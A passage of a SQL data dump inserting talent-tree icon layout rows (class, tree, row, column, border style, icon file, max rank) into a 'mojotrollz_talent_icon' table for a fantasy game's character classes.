'spell_nature_stoneskintotem.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 2, 2, 'talent_icon', 'icon_border_grey_down', 'ability_thunderbolt.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 2, 3, 'talent_icon', 'con_border_grey', 'spell_nature_spiritwolf.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_lightningshield.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_earthbindtotem.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 3, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 3, 3, 'talent_icon', 'icon_border_grey', 'inv_axe_10.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 3, 4, 'talent_icon', 'ico_border_grey', 'spell_nature_mirrorimage.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 4, 2, 'talent_icon', 'icon_border_grey_inc', 'ability_ghoulfrenzy.png', 5, 2, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_devotion.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'spell_fire_enchantweapon.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_fire_flametounge.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 5, 3, 'talent_icon', 'icon_border_grey', 'ability_parry.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_doen', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 6, 3, 'talent_icon', 'icon_border_grey', 'ability_hunter_swiftstrike.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_sealofmight.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_nature_magicimmunity.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_frost_manarecharge.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_reincarnation.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_undyingstrength.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_moonglow.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_frost_stun.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_healingwavelesser.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 3, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_nullward.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_nature_healingtouch.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 4, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_manaregentotem.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 4, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_tranquility.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 5, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_healingway.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 5, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_nature_ravenform.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_frost_wizardmark.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (7, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_frost_summonwaterelemental.png', 1, 4, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 1, 1, 'talent_icon', 'icon_border_green', 'spell_holy_dispelmagic.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 1, 2, 'talent_icon', 'icon_border_green', 'spell_holy_devotion.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 1, 3, 'talent_icon', 'icon_border_green', 'spell_nature_starfall.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'inv_wand_01.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_astralrecalgroup.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_manaburn.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_nature_abolishmagic.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_nature_wispsplode.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_arcane_arcaneresilience.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_detectlesserinvisibility.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_iceshock.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_shadow_siphonmana.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_enchantarmor.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 5, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_charm.png', 5, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 6, 2, 'talent_icon', 'icon_border_grey_inc_top_down', 'spell_shadow_teleport.png', 3, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 1, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_nature_lightning.png', 1, 6, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_fire_flamebolt.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 1, 3, 'talent_icon', 'icon_border_green', 'spell_fire_meteorstorm.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_fire_incinerate.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_fire_flare.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_fire_fireball.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_fire_flameshock.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 3, 2, 'talent_icon', 'icon_border_Grey', 'spell_fire_selfdestruct.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_fire_fireball02.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_fire_fire.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_fire_soulburn.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_fire_firearmor.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_fire_masterofelements.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_wispheal.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 5, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_holy_excorcism_02.png', 1, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_fire_immolation.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 2, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_fire_sealoffire.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 1, 1, 'talent_icon', 'icon_border_green', 'spell_frost_frostward.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 1, 2, 'talent_icon', 'icon_border_green', 'spell_frost_frostbolt02.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 1, 3, 'talent_icon', 'icon_border_green', 'spell_ice_magicdamage.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_frost_iceshard.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_frostarmor.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 2, 3, 'talent_icon', 'icon_border_grey_down', 'spell_frost_freezingbreath.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_frost_wisp.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_frost_frostbolt.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_wizardmark.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 3, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 3, 4, 'talent_icon', 'icon_border_grey', 'spell_frost_icestorm.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_darkritual.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_frost_stun.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 4, 3, 'talent_icon', 'icon_border_grey_inc', 'spell_frost_frostshock.png', 5, 2, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_frost_frost.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 5, 3, 'talent_icon', 'icon_border_grey', 'spell_frost_glacier.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 6, 2, 'talent_arrow', 'icon_arrow_grey_down', '', 0, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 6, 3, 'talent_icon', 'icon_border_grey', 'spell_frost_chillingblast.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (8, 3, 7, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_ice_lament.png', 1, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_unsummonbuilding.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 1, 3, 'talent_icon', 'icon_border_green', 'spell_shadow_abominationexplosion.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_curseofmannoroth.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_haunting.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_burningspirit.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 2, 4, 'talent_icon', 'icon_border_grey', 'spell_shadow_lifedrain02.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_curseofsargeras.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 3, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_fingerofdeath.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 3, 3, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_contagion.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 4, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_callofbone.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 4, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_twilight.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 4, 3, 'talent_arrow', 'icon_arrow_grey_down', '', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 4, 4, 'talent_icon', 'icon_border_grey', 'spell_shadow_siphonmana.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 5, 2, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_requiem.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 5, 3, 'talent_icon', 'icon_border_grey_inc_top_right', 'spell_shadow_grimward.png', 1, 3, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 5, 4, 'talent_icon', 'icon_border_grey_inc_left', 'spell_shadow_grimward.png', 4, 5, 3); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 6, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_shadetruesight.png', 5, 5, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 1, 7, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_darkritual.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 1, 1, 'talent_icon', 'icon_border_green', 'inv_stone_04.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 1, 2, 'talent_icon', 'icon_border_green', 'spell_shadow_summonimp.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 1, 3, 'talent_icon', 'icon_border_green', 'spell_shadow_metamorphosis.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 2, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_lifedrain.png', 2, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 2, 2, 'talent_icon', 'icon_border_grey', 'spell_shadow_summonvoidwalker.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 2, 3, 'talent_icon', 'icon_border_grey', 'spell_holy_magicalsentry.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 3, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_summonsuccubus.png', 3, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 3, 2, 'talent_icon', 'icon_border_grey_down', 'spell_nature_removecurse.png', 1, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 3, 3, 'talent_icon', 'icon_border_grey', 'spell_shadow_antishadow.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 4, 2, 'talent_icon', 'icon_border_grey_inc', 'spell_shadow_impphaseshift.png', 2, 3, 2); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 4, 3, 'talent_icon', 'icon_border_grey_down', 'spell_shadow_shadowworddominate.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, `type`, `border`, `icon`, `max`, `parent_row`, `parent_column`) VALUES (9, 2, 5, 1, 'talent_icon', 'icon_border_grey', 'spell_shadow_enslavedemon.png', 5, 0, 0); INSERT INTO `mojotrollz_talent_icon` (`class`, `tree`, `row`, `column`, 